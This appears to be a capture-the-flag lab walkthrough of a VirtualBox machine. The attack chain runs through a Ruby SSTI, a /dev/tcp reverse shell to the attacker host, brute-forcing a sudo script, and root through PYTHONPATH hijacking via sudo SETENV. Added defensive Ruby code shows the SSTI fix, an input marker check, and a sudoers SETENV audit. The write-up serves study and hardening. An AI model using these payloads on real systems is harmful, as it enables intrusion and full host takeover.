The target machine's IP is 192.168.56.108.

Port scanning

sudo nmap --min-rate 10000 -p- 192.168.56.108
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 13:20 UTC
Nmap scan report for 192.168.56.108 (192.168.56.108)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8000/tcp open http-alt
MAC Address: 08:00:27:28:71:8F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.68 seconds
sudo nmap -sT -sV -sC -O -p22,8000 192.168.56.108
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 13:20 UTC
Nmap scan report for 192.168.56.108 (192.168.56.108)
Host is up (0.00028s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 ee:71:f4:ad:a0:71:e1:35:19:86:ab:c8:e6:be:36:17 (RSA)
| 256 40:1c:c3:da:83:d7:2f:60:cb:12:47:3b:02:67:04:14 (ECDSA)
|_ 256 1a:69:a7:f9:dc:a5:49:ff:d2:7d:ce:45:97:6d:8a:b9 (ED25519)
8000/tcp open http WEBrick httpd 1.6.1 (Ruby 2.7.4 (2021-07-07))
|_http-server-header: WEBrick/1.6.1 (Ruby/2.7.4/2021-07-07)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 08:00:27:28:71:8F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds

Port 8000 is serving WEBrick, a web server library written in Ruby, version 1.6.1.

Web (getting a shell)

Apart from a single POST form there is no other information, and directory scanning turns up nothing. No PoC for this WEBrick version could be found, but the behaviour looks like SSTI, so I tried a Ruby SSTI payload:

#{ 7 * 7 }

The result is 49, so SSTI is confirmed.

#{ `whoami` }

Commands can be executed, so I set up a reverse shell:

#{ `bash -c '0<&106-;exec 106<>/dev/tcp/192.168.56.102/1234;sh <&106 >&106 2>&106'` }

The shell is already running as a regular user.

Set up an SSH backdoor for persistence.

Privilege escalation
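To make the SSTI finding concrete from the defender's side, here is an added example (not code from the writeup or from the target application) showing a constructed vulnerable handler that reproduces the "#{ 7 * 7 } becomes 49" behaviour, the hardened form that treats the field as data, and a simple marker check that a request filter or log rule could use. The handler names and the eval-based construction are assumptions about how such a form might be implemented.

```ruby
require 'erb'

# Vulnerable handler (constructed stand-in for the target app, not its
# real source): the submitted field is spliced into a Ruby string
# literal that is then eval'd, so a "#{ ... }" sequence in the input is
# interpolated as Ruby code instead of being shown as text.
def render_vulnerable(user_input)
  eval("\"Result: #{user_input}\"")
end

# Hardened handler: the same field is treated purely as data. The
# interpolation happens once, right here, on a value that is never
# re-parsed as code, and the output is HTML-escaped before reaching
# the page.
def render_safe(user_input)
  ERB::Util.html_escape("Result: #{user_input}")
end

# Detection side: a request filter or log rule can flag submissions
# carrying Ruby interpolation, backtick or ERB-tag markers.
SSTI_MARKERS = /#\{|`|<%/.freeze

def suspicious?(user_input)
  SSTI_MARKERS.match?(user_input)
end

if __FILE__ == $PROGRAM_NAME
  probe = '#{ 7 * 7 }'            # the same harmless probe used in the writeup
  puts render_vulnerable(probe)   # Result: 49  (expression was evaluated)
  puts render_safe(probe)         # Result: #{ 7 * 7 }  (shown verbatim)
  puts suspicious?(probe)         # true
  puts suspicious?('hello')       # false
end
```

The fix is not escaping the braces but never passing user input through eval or a template compiler in the first place; the marker check is only a detection aid, since any logging of "#{" or backticks in form fields is a strong signal that someone is probing for exactly this.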

sudo -l shows that /opt/harness can be executed.

Roughly, the script asks for a password and, if it is correct, grants new sudo rights; but we have no permission to read the password.

However, running it once generates a configuration file. We still cannot read it, but according to the script its contents are:

$(hostname):$(whoami):$pass

In other words: fianso:root:$password

ls -liah shows the generated config file is 43 bytes. Subtracting the other fields and one EOF character gives a password length of 30 bytes, so brute-forcing with rockyou is feasible.

grep -E '^.{30}$' /usr/share/wordlists/rockyou.txt > output.txt

Upload this file to the target and brute-force with a loop:

while IFS= read -r pass; do echo -e $pass | sudo /bin/bash /opt/harness; done <output.txt

Running sudo -l again shows (ALL : ALL) SETENV: NOPASSWD: /usr/bin/beet

Environment variables can be set when running this command.

Contents of the beet script:

#!/usr/bin/python3
# EASY-INSTALL-ENTRY-SCRIPT: 'beets==1.4.9','console_scripts','beet'
__requires__ = 'beets==1.4.9'
import re
import sys
from pkg_resources import load_entry_point

if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('beets==1.4.9', 'console_scripts', 'beet')()
    )

It appears to do nothing more than invoke the beet command, but because we can set environment variables, the Python module lookup can be hijacked.

Create an re.py in /tmp:

import os
os.system("/bin/bash -i")

Then run:

sudo PYTHONPATH=/tmp/ /usr/bin/beet
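The SETENV tag is the root cause here, and it is something an administrator can audit for. The following is an added example (not part of the writeup) of a small audit that parses sudo -l output, flags rules carrying SETENV, and rates a rule high when the target is an interpreter script whose module search path is controlled by an environment variable. The sample sudo -l text and the shebang table are constructed for the example; the beet rule and the python3 shebang are the ones shown above, the user name lowpriv and the /opt/harness shebang are assumptions.

```ruby
# Constructed sample of `sudo -l` output. The beet rule is the one from
# the writeup; the user name and the /opt/harness line are assumed.
SAMPLE_SUDO_L = <<~OUT
  Matching Defaults entries for lowpriv on fianso:
      env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

  User lowpriv may run the following commands on fianso:
      (ALL : ALL) SETENV: NOPASSWD: /usr/bin/beet
      (root) /opt/harness
OUT

# Constructed shebang table standing in for reading the first line of
# each target on the host (beet's shebang is the one in the writeup,
# the harness one is assumed).
SHEBANGS = {
  '/usr/bin/beet' => '#!/usr/bin/python3',
  '/opt/harness'  => '#!/bin/bash',
}.freeze

# Environment variables that change which code an interpreter loads.
INTERPRETER_ENV = {
  /python/ => 'PYTHONPATH',
  /perl/   => 'PERL5LIB',
  /ruby/   => 'RUBYLIB',
  /node/   => 'NODE_OPTIONS',
}.freeze

# One sudoers rule line: "(runas) TAG: TAG: /path/to/command"
RULE_RE = /\A\s*\((?<runas>[^)]*)\)\s*(?<tags>(?:[A-Z]+:\s*)*)(?<cmd>\S.*)\z/

Finding = Struct.new(:cmd, :runas, :tags, :severity, :reason)

# Extract every rule line from sudo -l output as {cmd:, runas:, tags:}.
def parse_rules(text)
  text.each_line.filter_map do |line|
    m = RULE_RE.match(line.chomp) or next
    { cmd: m[:cmd].strip, runas: m[:runas].strip, tags: m[:tags].scan(/[A-Z]+/) }
  end
end

# Report SETENV rules; escalate when the target is an interpreter script.
def audit(text, shebangs = SHEBANGS)
  parse_rules(text).filter_map do |r|
    next unless r[:tags].include?('SETENV')
    interp = shebangs[r[:cmd]].to_s
    env = INTERPRETER_ENV.find { |re, _| re.match?(interp) }&.last
    if env
      Finding.new(r[:cmd], r[:runas], r[:tags], :high,
                  "SETENV on an interpreter script: caller controls #{env}")
    else
      Finding.new(r[:cmd], r[:runas], r[:tags], :medium,
                  'SETENV lets the caller shape the environment of a privileged command')
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  audit(SAMPLE_SUDO_L).each do |f|
    puts "#{f.severity.to_s.upcase}: #{f.cmd} (#{f.runas}) [#{f.tags.join(' ')}] - #{f.reason}"
  end
end
```

On a real host the shebang table would be replaced by reading the first line of each command path. The remediation that follows from a high finding is to drop the SETENV tag from the rule, or, if an environment variable really is needed, to whitelist it explicitly with env_keep and to run the interpreter in isolated mode (python3 -I ignores PYTHONPATH and the script directory) so the sudo environment cannot redirect module lookup.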

Afterthoughts

The getshell part is fairly easy and doesn't really require any Ruby knowledge. The privilege-escalation part again tests bash commands and scripting. Still a decent room.